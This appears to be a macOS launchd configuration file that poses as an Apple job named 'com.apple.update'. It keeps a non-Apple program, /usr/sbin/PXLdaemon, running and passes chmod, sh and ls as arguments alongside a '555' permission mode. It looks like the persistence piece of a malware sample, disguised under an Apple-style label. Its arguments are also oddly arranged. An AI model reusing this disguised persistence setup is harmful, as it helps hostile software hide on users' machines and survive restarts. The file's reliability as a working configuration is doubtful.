<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
                <key>Label</key>
                <string>com.apple.update</string>
                <key>ProgramArguments</key>
                <array>
                     <string>/usr/sbin/update</string>
                     <string>555</string>
                     <string>/bin/chmod</string>
                     <string>/bin/sh</string>
                     <string>/bin/ls</string>
                     <string>/usr/sbin/PXLdaemon</string>
                </array>
                <key>OnDemand</key>
                <false/>
</dict>
</plist>
